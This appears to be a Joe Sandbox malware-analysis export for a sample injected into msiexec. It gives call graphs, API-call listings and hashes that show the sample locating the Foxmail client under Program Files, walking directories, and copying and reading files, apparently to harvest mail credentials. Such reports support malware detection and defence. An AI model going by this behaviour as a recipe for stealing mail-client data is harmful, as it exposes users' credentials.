6155->6156 6157 2a8159d lstrlenW lstrcatW 6156->6157 6158 2a810f1 57 API calls 6157->6158 6158->6149 6160 2a81118 ___scrt_fastfail 6159->6160 6161 2a81129 lstrlenW 6160->6161 6172 2a82c40 6161->6172 6164 2a81168 lstrlenW 6165 2a81177 lstrlenW FindFirstFileW 6164->6165 6166 2a811a0 6165->6166 6167 2a811e1 6165->6167 6168 2a811aa 6166->6168 6169 2a811c7 FindNextFileW 6166->6169 6167->6138 6168->6169 6174 2a81000 6168->6174 6169->6166 6171 2a811da FindClose 6169->6171 6171->6167 6173 2a81148 lstrcatW lstrlenW 6172->6173 6173->6164 6173->6165 6175 2a81022 ___scrt_fastfail 6174->6175 6176 2a810af 6175->6176 6177 2a8102f lstrcatW lstrlenW 6175->6177 6180 2a810ad 6176->6180 6181 2a810b5 lstrlenW 6176->6181 6178 2a8105a lstrlenW 6177->6178 6179 2a8106b lstrlenW 6177->6179 6178->6179 6191 2a81e89 lstrlenW 6179->6191 6180->6168 6205 2a81e16 6181->6205 6184 2a81088 GetFileAttributesW 6184->6180 6186 2a8109c 6184->6186 6185 2a810ca 6185->6180 6187 2a81e89 5 API calls 6185->6187 6186->6180 6197 2a8173a 6186->6197 6188 2a810df 6187->6188 6210 2a811ea 6188->6210 6192 2a82c40 ___scrt_fastfail 6191->6192 6193 2a81ea7 lstrcatW lstrlenW 6192->6193 6194 2a81ed1 lstrcatW 6193->6194 6195 2a81ec2 6193->6195 6194->6184 6195->6194 6196 2a81ec7 lstrlenW 6195->6196 6196->6194 6198 2a81747 ___scrt_fastfail 6197->6198 6225 2a81cca 6198->6225 6201 2a8199f 6201->6180 6203 2a81824 ___scrt_fastfail _strlen 6203->6201 6245 2a815da 6203->6245 6206 2a81e29 6205->6206 6209 2a81e4c 6205->6209 6207 2a81e2d lstrlenW 6206->6207 6206->6209 6208 2a81e3f lstrlenW 6207->6208 6207->6209 6208->6209 6209->6185 6211 2a8120e ___scrt_fastfail 6210->6211 6212 2a81e89 5 API calls 6211->6212 6213 2a81220 GetFileAttributesW 6212->6213 6214 2a81235 6213->6214 6215 2a81246 6213->6215 6214->6215 6217 2a8173a 35 API calls 6214->6217 6216 2a81e89 5 API calls 6215->6216 6218 2a81258 6216->6218 6217->6215 6219 2a810f1 56 API calls 6218->6219 6220 2a8126d 6219->6220 6221 2a81e89 5 API calls 6220->6221 6222 2a8127f ___scrt_fastfail 6221->6222 6223 2a810f1 56 API calls 6222->6223 6224 2a812e6 6223->6224 6224->6180 6226 2a81cf1 ___scrt_fastfail 6225->6226 6227 2a81d0f CopyFileW CreateFileW 6226->6227 6228 2a81d44 DeleteFileW 6227->6228 6229 2a81d55 GetFileSize 6227->6229 6234 2a81808 6228->6234 6230 2a81ede 22 API calls 6229->6230 6231 2a81d66 ReadFile 6230->6231 6232 2a81d7d CloseHandle DeleteFileW 6231->6232 6233 2a81d94 CloseHandle DeleteFileW 6231->6233 6232->6234 6233->6234 6234->6201 6235 2a81ede 6234->6235 6237 2a8222f 6235->6237 6238 2a8224e 6237->6238 6241 2a82250 6237->6241 6253 2a8474f 6237->6253 6258 2a847e5 6237->6258 6238->6203 6240 2a82908 6242 2a835d2 __CxxThrowException@8 RaiseException 6240->6242 6241->6240 6265 2a835d2 6241->6265 6244 2a82925 6242->6244 6244->6203 6246 2a8160c _strcat _strlen 6245->6246 6247 2a8163c lstrlenW 6246->6247 6353 2a81c9d 6247->6353 6249 2a81655 lstrcatW lstrlenW 6250 2a81678 6249->6250 6251 2a8167e lstrcatW 6250->6251 6252 2a81693 ___scrt_fastfail 6250->6252 6251->6252 6252->6203 6268 2a84793 6253->6268 6255 2a84765 6274 2a82ada 6255->6274 6257 2a8478f 6257->6237 6263 2a856d0 __dosmaperr 6258->6263 6259 2a8570e 6287 2a86368 6259->6287 6260 2a856f9 RtlAllocateHeap 6262 2a8570c 6260->6262 6260->6263 6262->6237 6263->6259 6263->6260 6264 2a8474f __dosmaperr 7 API calls 6263->6264 6264->6263 6267 2a835f2 RaiseException 6265->6267 6267->6240 6269 2a8479f ___DestructExceptionObject 6268->6269 6281 2a85671 RtlEnterCriticalSection 6269->6281 6271 2a847aa 6282 2a847dc 6271->6282 6273 2a847d1 _abort 6273->6255 6275 2a82ae3 6274->6275 6276 2a82ae5 IsProcessorFeaturePresent 6274->6276 6275->6257 6278 2a82b58 6276->6278 6286 2a82b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6278->6286 6280 2a82c3b 6280->6257 6281->6271 6285 2a856b9 RtlLeaveCriticalSection 6282->6285 6284 2a847e3 6284->6273 6285->6284 6286->6280 6290 2a85b7a GetLastError 6287->6290 6291 2a85b93 6290->6291 6295 2a85b99 6290->6295 6309 2a85e08 6291->6309 6296 2a85bf0 SetLastError 6295->6296 6316 2a8637b 6295->6316 6298 2a85bf9 6296->6298 6297 2a85bb3 6323 2a8571e 6297->6323 6298->6262 6302 2a85bb9 6304 2a85be7 SetLastError 6302->6304 6303 2a85bcf 6336 2a8593c 6303->6336 6304->6298 6307 2a8571e _free 17 API calls 6308 2a85be0 6307->6308 6308->6296 6308->6304 6341 2a85c45 6309->6341 6311 2a85e2f 6312 2a85e3b 6311->6312 6313 2a85e47 TlsGetValue 6311->6313 6314 2a82ada _ValidateLocalCookies 5 API calls 6312->6314 6313->6312 6315 2a85e58 6314->6315 6315->6295 6320 2a86388 __dosmaperr 6316->6320 6317 2a863c8 6319 2a86368 _free 19 API calls 6317->6319 6318 2a863b3 RtlAllocateHeap 6318->6320 6321 2a85bab 6318->6321 6319->6321 6320->6317 6320->6318 6322 2a8474f __dosmaperr 7 API calls 6320->6322 6321->6297 6329 2a85e5e 6321->6329 6322->6320 6324 2a85729 HeapFree 6323->6324 6325 2a85752 _free 6323->6325 6324->6325 6326 2a8573e 6324->6326 6325->6302 6327 2a86368 _free 18 API calls 6326->6327 6328 2a85744 GetLastError 6327->6328 6328->6325 6330 2a85c45 __dosmaperr 5 API calls 6329->6330 6331 2a85e85 6330->6331 6332 2a85ea0 TlsSetValue 6331->6332 6333 2a85e94 6331->6333 6332->6333 6334 2a82ada _ValidateLocalCookies 5 API calls 6333->6334 6335 2a85bc8 6334->6335 6335->6297 6335->6303 6347 2a85914 6336->6347 6343 2a85c71 6341->6343 6346 2a85c75 __crt_fast_encode_pointer 6341->6346 6342 2a85ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6342->6343 6343->6342 6345 2a85c95 6343->6345 6343->6346 6344 2a85ca1 GetProcAddress 6344->6346 6345->6344 6345->6346 6346->6311 6348 2a85854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6347->6348 6349 2a85938 6348->6349 6350 2a858c4 6349->6350 6351 2a85758 __dosmaperr 20 API calls 6350->6351 6352 2a858e8 6351->6352 6352->6307 6354 2a81ca6 _strlen 6353->6354 6354->6249 6923 2a820db 6926 2a820e7 ___DestructExceptionObject 6923->6926 6924 2a820f6 6925 2a82110 dllmain_raw 6925->6924 6927 2a8212a 6925->6927 6926->6924 6926->6925 6929 2a8210b 6926->6929 6936 2a81eec 6927->6936 6929->6924 6930 2a82177 6929->6930 6934 2a81eec 31 API calls 6929->6934 6930->6924 6931 2a81eec 31 API calls 6930->6931 6932 2a8218a 6931->6932 6932->6924 6933 2a82193 dllmain_raw 6932->6933 6933->6924 6935 2a8216d dllmain_raw 6934->6935 6935->6930 6937 2a81f2a dllmain_crt_process_detach 6936->6937 6938 2a81ef7 6936->6938 6945 2a81f06 6937->6945 6939 2a81f1c dllmain_crt_process_attach 6938->6939 6940 2a81efc 6938->6940 6939->6945 6941 2a81f01 6940->6941 6942 2a81f12 6940->6942 6941->6945 6946 2a8240b 6941->6946 6951 2a823ec 6942->6951 6945->6929 6959 2a853e5 6946->6959 7070 2a83513 6951->7070 6954 2a823f5 6954->6945 6957 2a82408 6957->6945 6958 2a8351e 7 API calls 6958->6954 6965 2a85aca 6959->6965 6962 2a8351e 7041 2a83820 6962->7041 6964 2a82415 6964->6945 6966 2a85ad4 6965->6966 6967 2a82410 6965->6967 6968 2a85e08 __dosmaperr 11 API calls 6966->6968 6967->6962 6969 2a85adb 6968->6969 6969->6967 6970 2a85e5e __dosmaperr 11 API calls 6969->6970 6971 2a85aee 6970->6971 6973 2a859b5 6971->6973 6974 2a859c0 6973->6974 6975 2a859d0 6973->6975 6979 2a859d6 6974->6979 6975->6967 6978 2a8571e _free 20 API calls 6978->6975 6980 2a859e9 6979->6980 6981 2a859ef 6979->6981 6982 2a8571e _free 20 API calls 6980->6982 6983 2a8571e _free 20 API calls 6981->6983 6982->6981 6984 2a859fb 6983->6984 6985 2a8571e _free 20 API calls 6984->6985 6986 2a85a06 6985->6986 6987 2a8571e _free 20 API calls 6986->6987 6988 2a85a11 6987->6988 6989 2a8571e _free 20 API calls 6988->6989 6990 2a85a1c 6989->6990 6991 2a8571e _free 20 API calls 6990->6991 6992 2a85a27 6991->6992 6993 2a8571e _free 20 API calls 6992->6993 6994 2a85a32 6993->6994 6995 2a8571e _free 20 API calls 6994->6995 6996 2a85a3d 6995->6996 6997 2a8571e _free 20 API calls 6996->6997 6998 2a85a48 6997->6998 6999 2a8571e _free 20 API calls 6998->6999 7000 2a85a56 6999->7000 7005 2a8589c 7000->7005 7011 2a857a8 7005->7011 7007 2a858c0 7008 2a858ec 7007->7008 7024 2a85809 7008->7024 7010 2a85910 7010->6978 7012 2a857b4 ___DestructExceptionObject 7011->7012 7019 2a85671 RtlEnterCriticalSection 7012->7019 7014 2a857e8 7020 2a857fd 7014->7020 7016 2a857be 7016->7014 7018 2a8571e _free 20 API calls 7016->7018 7017 2a857f5 _abort 7017->7007 7018->7014 7019->7016 7023 2a856b9 RtlLeaveCriticalSection 7020->7023 7022 2a85807 7022->7017 7023->7022 7025 2a85815 ___DestructExceptionObject 7024->7025 7032 2a85671 RtlEnterCriticalSection 7025->7032 7027 2a8581f 7033 2a85a7f 7027->7033 7029 2a85832 7037 2a85848 7029->7037 7031 2a85840 _abort 7031->7010 7032->7027 7034 2a85a8e __fassign 7033->7034 7036 2a85ab5 __fassign 7033->7036 7035 2a87cc2 __fassign 20 API calls 7034->7035 7034->7036 7035->7036 7036->7029 7040 2a856b9 RtlLeaveCriticalSection 7037->7040 7039 2a85852 7039->7031 7040->7039 7042 2a8382d 7041->7042 7043 2a8384b ___vcrt_freefls@4 7041->7043 7046 2a8383b 7042->7046 7047 2a83b67 7042->7047 7043->6964 7052 2a83ba2 7046->7052 7057 2a83a82 7047->7057 7049 2a83b81 7050 2a83b99 TlsGetValue 7049->7050 7051 2a83b8d 7049->7051 7050->7051 7051->7046 7053 2a83a82 try_get_function 5 API calls 7052->7053 7054 2a83bbc 7053->7054 7055 2a83bd7 TlsSetValue 7054->7055 7056 2a83bcb 7054->7056 7055->7056 7056->7043 7058 2a83aaa 7057->7058 7062 2a83aa6 __crt_fast_encode_pointer 7057->7062 7058->7062 7063 2a839be 7058->7063 7061 2a83ac4 GetProcAddress 7061->7062 7062->7049 7064 2a839cd try_get_first_available_module 7063->7064 7065 2a83a77 7064->7065 7066 2a839ea LoadLibraryExW 7064->7066 7068 2a83a60 FreeLibrary 7064->7068 7069 2a83a38 LoadLibraryExW 7064->7069 7065->7061 7065->7062 7066->7064 7067 2a83a05 GetLastError 7066->7067 7067->7064 7068->7064 7069->7064 7076 2a83856 7070->7076 7072 2a823f1 7072->6954 7073 2a853da 7072->7073 7074 2a85b7a __dosmaperr 20 API calls 7073->7074 7075 2a823fd 7074->7075 7075->6957 7075->6958 7077 2a8385f 7076->7077 7078 2a83862 GetLastError 7076->7078 7077->7072 7079 2a83b67 ___vcrt_FlsGetValue 6 API calls 7078->7079 7080 2a83877 7079->7080 7081 2a838dc SetLastError 7080->7081 7082 2a83ba2 ___vcrt_FlsSetValue 6 API calls 7080->7082 7087 2a83896 7080->7087 7081->7072 7083 2a83890 7082->7083 7084 2a838b8 7083->7084 7085 2a83ba2 ___vcrt_FlsSetValue 6 API calls 7083->7085 7083->7087 7086 2a83ba2 ___vcrt_FlsSetValue 6 API calls 7084->7086 7084->7087 7085->7084 7086->7087 7087->7081 7188 2a8281c 7191 2a82882 7188->7191 7194 2a83550 7191->7194 7193 2a8282a 7195 2a8355d 7194->7195 7198 2a8358a 7194->7198 7196 2a847e5 ___std_exception_copy 21 API calls 7195->7196 7195->7198 7197 2a8357a 7196->7197 7197->7198 7199 2a8544d ___std_exception_copy 26 API calls 7197->7199 7198->7193 7199->7198 7578 2a84bdd 7579 2a84c08 7578->7579 7580 2a84bec 7578->7580 7582 2a86d60 51 API calls 7579->7582 7580->7579 7581 2a84bf2 7580->7581 7583 2a86368 _free 20 API calls 7581->7583 7584 2a84c0f GetModuleFileNameA 7582->7584 7585 2a84bf7 7583->7585 7586 2a84c33 7584->7586 7587 2a862ac ___std_exception_copy 26 API calls 7585->7587 7601 2a84d01 7586->7601 7588 2a84c01 7587->7588 7591 2a84e76 20 API calls 7592 2a84c5d 7591->7592 7593 2a84c72 7592->7593 7594 2a84c66 7592->7594 7596 2a84d01 38 API calls 7593->7596 7595 2a86368 _free 20 API calls 7594->7595 7597 2a84c6b 7595->7597 7599 2a84c88 7596->7599 7598 2a8571e _free 20 API calls 7597->7598 7598->7588 7599->7597 7600 2a8571e _free 20 API calls 7599->7600 7600->7597 7603 2a84d26 7601->7603 7605 2a84d86 7603->7605 7607 2a870eb 7603->7607 7604 2a84c50 7604->7591 7605->7604 7606 2a870eb 38 API calls 7605->7606 7606->7605 7610 2a87092 7607->7610 7611 2a854a7 __fassign 38 API calls 7610->7611 7612 2a870a6 7611->7612 7612->7603 6922 2a83c90 RtlUnwind 7088 2a836d0 7089 2a836e2 7088->7089 7090 2a836f0 @_EH4_CallFilterFunc@8 7088->7090 7091 2a82ada _ValidateLocalCookies 5 API calls 7089->7091 7091->7090 8142 2a85351 8143 2a85374 8142->8143 8144 2a85360 8142->8144 8145 2a8571e _free 20 API calls 8143->8145 8144->8143 8146 2a8571e _free 20 API calls 8144->8146 8147 2a85386 8145->8147 8146->8143 8148 2a8571e _free 20 API calls 8147->8148 8149 2a85399 8148->8149 8150 2a8571e _free 20 API calls 8149->8150 8151 2a853aa 8150->8151 8152 2a8571e _free 20 API calls 8151->8152 8153 2a853bb 8152->8153 7613 2a873d5 7614 2a873e1 ___DestructExceptionObject 7613->7614 7625 2a85671 RtlEnterCriticalSection 7614->7625 7616 2a873e8 7617 2a88be3 27 API calls 7616->7617 7618 2a873f7 7617->7618 7624 2a87406 7618->7624 7626 2a87269 GetStartupInfoW 7618->7626 7622 2a87417 _abort 7637 2a87422 7624->7637 7625->7616 7627 2a87318 7626->7627 7628 2a87286 7626->7628 7632 2a8731f 7627->7632 7628->7627 7629 2a88be3 27 API calls 7628->7629 7630 2a872af 7629->7630 7630->7627 7631 2a872dd GetFileType 7630->7631 7631->7630 7634 2a87326 7632->7634 7633 2a87369 GetStdHandle 7633->7634 7634->7633 7635 2a873d1 7634->7635 7636 2a8737c GetFileType 7634->7636 7635->7624 7636->7634 7640 2a856b9 RtlLeaveCriticalSection 7637->7640 7639 2a87429 7639->7622 7640->7639 7092 2a84ed7 7093 2a86d60 51 API calls 7092->7093 7094 2a84ee9 7093->7094 7103 2a87153 GetEnvironmentStringsW 7094->7103 7097 2a84ef4 7099 2a8571e _free 20 API calls 7097->7099 7100 2a84f29 7099->7100 7101 2a84eff 7102 2a8571e _free 20 API calls 7101->7102 7102->7097 7104 2a8716a 7103->7104 7114 2a871bd 7103->7114 7107 2a87170 WideCharToMultiByte 7104->7107 7105 2a84eee 7105->7097 7115 2a84f2f 7105->7115 7106 2a871c6 FreeEnvironmentStringsW 7106->7105 7108 2a8718c 7107->7108 7107->7114 7109 2a856d0 21 API calls 7108->7109 7110 2a87192 7109->7110 7111 2a87199 WideCharToMultiByte 7110->7111 7112 2a871af 7110->7112 7111->7112 7113 2a8571e _free 20 API calls 7112->7113 7113->7114 7114->7105 7114->7106 7116 2a84f44 7115->7116 7117 2a8637b __dosmaperr 20 API calls 7116->7117 7127 2a84f6b 7117->7127 7118 2a84fcf 7119 2a8571e _free 20 API calls 7118->7119 7120 2a84fe9 7119->7120 7120->7101 7121 2a8637b __dosmaperr 20 API calls 7121->7127 7122 2a84fd1 7123 2a85000 20 API calls 7122->7123 7125 2a84fd7 7123->7125 7126 2a8571e _free 20 API calls 7125->7126 7126->7118 7127->7118 7127->7121 7127->7122 7128 2a84ff3 7127->7128 7130 2a8571e _free 20 API calls 7127->7130 7132 2a8544d 7127->7132 7129 2a862bc ___std_exception_copy 11 API calls 7128->7129 7131 2a84fff 7129->7131 7130->7127 7133 2a8545a 7132->7133 7135 2a85468 7132->7135 7133->7135 7139 2a8547f 7133->7139 7134 2a86368 _free 20 API calls 7136 2a85470 7134->7136 7135->7134 7137 2a862ac ___std_exception_copy 26 API calls 7136->7137 7138 2a8547a 7137->7138 7138->7127 7139->7138 7140 2a86368 _free 20 API calls 7139->7140 7140->7136

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 02A81137
                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02A81151
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02A8115C
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02A8116D
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02A8117C
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02A81193
                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02A811D0
                                                                                • FindClose.KERNEL32(00000000), ref: 02A811DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                • String ID:
                                                                                • API String ID: 1083526818-0
                                                                                • Opcode ID: bdc6bd65e3d56b72992d47a23ea9abcd346462303aed653d4a9c78c3c31d2cad
                                                                                • Instruction ID: 1ab44481f9192c91283d2781ad09c840a2955c5f6288fb8a366237c6b2a522d9
                                                                                • Opcode Fuzzy Hash: bdc6bd65e3d56b72992d47a23ea9abcd346462303aed653d4a9c78c3c31d2cad
                                                                                • Instruction Fuzzy Hash: 0A2181719443486BD720EB649C48FAB7BECEF84314F140D2AF959D31D0EB30D6198B96

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 02A81434
                                                                                  • Part of subcall function 02A810F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 02A81137
                                                                                  • Part of subcall function 02A810F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02A81151
                                                                                  • Part of subcall function 02A810F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02A8115C
                                                                                  • Part of subcall function 02A810F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02A8116D
                                                                                  • Part of subcall function 02A810F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02A8117C
                                                                                  • Part of subcall function 02A810F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02A81193
                                                                                  • Part of subcall function 02A810F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02A811D0
                                                                                  • Part of subcall function 02A810F1: FindClose.KERNEL32(00000000), ref: 02A811DB
                                                                                • lstrlenW.KERNEL32(?), ref: 02A814C5
                                                                                • lstrlenW.KERNEL32(?), ref: 02A814E0
                                                                                • lstrlenW.KERNEL32(?,?), ref: 02A8150F
                                                                                • lstrcatW.KERNEL32(00000000), ref: 02A81521
                                                                                • lstrlenW.KERNEL32(?,?), ref: 02A81547
                                                                                • lstrcatW.KERNEL32(00000000), ref: 02A81553
                                                                                • lstrlenW.KERNEL32(?,?), ref: 02A81579
                                                                                • lstrcatW.KERNEL32(00000000), ref: 02A81585
                                                                                • lstrlenW.KERNEL32(?,?), ref: 02A815AB
                                                                                • lstrcatW.KERNEL32(00000000), ref: 02A815B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                • API String ID: 672098462-2938083778
                                                                                • Opcode ID: 4e3a0f39f2097a4b85d04effe58a1423001c68eee3528cdc436dc872c30f13f3
                                                                                • Instruction ID: 28d9d2528b7494e170dbf78350a3355159a8487dafb874fe1540c925b1c50fe1
                                                                                • Opcode Fuzzy Hash: 4e3a0f39f2097a4b85d04effe58a1423001c68eee3528cdc436dc872c30f13f3
                                                                                • Instruction Fuzzy Hash: 0D81A371A80368A9EB20E7A5DC45FEE737AEF84700F000596F609E7190EEB15A85CF95
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02A861DA
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02A861E4
                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 02A861F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                • String ID:
                                                                                • API String ID: 3906539128-0
                                                                                • Opcode ID: 424cb43b7268e4fcc06695da5df63b26554d3724ecb05fe809780844bd9484af
                                                                                • Instruction ID: 65b217ed018e10c815967dc91c075296a0591f3114d0b01f03941ff4ed77a0db
                                                                                • Opcode Fuzzy Hash: 424cb43b7268e4fcc06695da5df63b26554d3724ecb05fe809780844bd9484af
                                                                                • Instruction Fuzzy Hash: AF31C474D4121C9BCB21EF64DD88B9DBBB8BF08710F5045DAE91CA7250EB309B958F45
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,02A84A8A,?,02A92238,0000000C,02A84BBD,00000000,00000000,00000001,02A82082,02A92108,0000000C,02A81F3A,?), ref: 02A84AD5
                                                                                • TerminateProcess.KERNEL32(00000000,?,02A84A8A,?,02A92238,0000000C,02A84BBD,00000000,00000000,00000001,02A82082,02A92108,0000000C,02A81F3A,?), ref: 02A84ADC
                                                                                • ExitProcess.KERNEL32 ref: 02A84AEE
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 919f045397025d3815a47ec411bf3336c1921a9b66668a6317bc42844904aef8
                                                                                • Instruction ID: 7c90f91047e58ed7b17f5bda2a680917a1881f704867cc39a02a7bae44a2d494
                                                                                • Opcode Fuzzy Hash: 919f045397025d3815a47ec411bf3336c1921a9b66668a6317bc42844904aef8
                                                                                • Instruction Fuzzy Hash: FEE04636440609AFCF027F24EE48A493B7AEF04341B008420FA068B160DF35D853DA44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .
                                                                                • API String ID: 0-248832578
                                                                                • Opcode ID: cdb377740520fa020a1fdee679592f2eee187c963b1d34c94df34166453f9f01
                                                                                • Instruction ID: 91ee2e021b71fd53a06335fd89cd332a07e00888bfbea1fd1de9d345ccbee5d6
                                                                                • Opcode Fuzzy Hash: cdb377740520fa020a1fdee679592f2eee187c963b1d34c94df34166453f9f01
                                                                                • Instruction Fuzzy Hash: 8631E571900149AFEB28AF78CCC4FFB7BBEDB85704F0401A8E91997251EE319A458B50
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess
                                                                                • String ID:
                                                                                • API String ID: 54951025-0
                                                                                • Opcode ID: 8079036cc2505367792a0513aed9ab2c8fc8172725bb8b42ff3ef93cbf62be43
                                                                                • Instruction ID: 8bba30d8306e9b4986ba92827949b0ff2f33783d286d5a7eada8bc71b952291f
                                                                                • Opcode Fuzzy Hash: 8079036cc2505367792a0513aed9ab2c8fc8172725bb8b42ff3ef93cbf62be43
                                                                                • Instruction Fuzzy Hash: D6A01130A802028F8B008E32AA0A30C3ABCAA0038030008AAA80BC8080EF20C0228A00

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 63 2a8173a-2a817fe call 2a8c030 call 2a82c40 * 2 70 2a81803 call 2a81cca 63->70 71 2a81808-2a8180c 70->71 72 2a819ad-2a819b1 71->72 73 2a81812-2a81816 71->73 73->72 74 2a8181c-2a81837 call 2a81ede 73->74 77 2a8183d-2a81845 74->77 78 2a8199f-2a819ac call 2a81ee7 * 2 74->78 79 2a8184b-2a8184e 77->79 80 2a81982-2a81985 77->80 78->72 79->80 84 2a81854-2a81881 call 2a844b0 * 2 call 2a81db7 79->84 82 2a81995-2a81999 80->82 83 2a81987 80->83 82->77 82->78 86 2a8198a-2a8198d call 2a82c40 83->86 97 2a8193d-2a81943 84->97 98 2a81887-2a8189f call 2a844b0 call 2a81db7 84->98 92 2a81992 86->92 92->82 99 2a8197e-2a81980 97->99 100 2a81945-2a81947 97->100 98->97 114 2a818a5-2a818a8 98->114 99->86 100->99 102 2a81949-2a8194b 100->102 104 2a8194d-2a8194f 102->104 105 2a81961-2a8197c call 2a816aa 102->105 107 2a81951-2a81953 104->107 108 2a81955-2a81957 104->108 105->92 107->105 107->108 111 2a81959-2a8195b 108->111 112 2a8195d-2a8195f 108->112 111->105 111->112 112->99 112->105 115 2a818aa-2a818c2 call 2a844b0 call 2a81db7 114->115 116 2a818c4-2a818dc call 2a844b0 call 2a81db7 114->116 115->116 125 2a818e2-2a8193b call 2a816aa call 2a815da call 2a82c40 * 2 115->125 116->82 116->125 125->82
                                                                                APIs
                                                                                  • Part of subcall function 02A81CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A81D1B
                                                                                  • Part of subcall function 02A81CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 02A81D37
                                                                                  • Part of subcall function 02A81CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A81D4B
                                                                                • _strlen.LIBCMT ref: 02A81855
                                                                                • _strlen.LIBCMT ref: 02A81869
                                                                                • _strlen.LIBCMT ref: 02A8188B
                                                                                • _strlen.LIBCMT ref: 02A818AE
                                                                                • _strlen.LIBCMT ref: 02A818C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
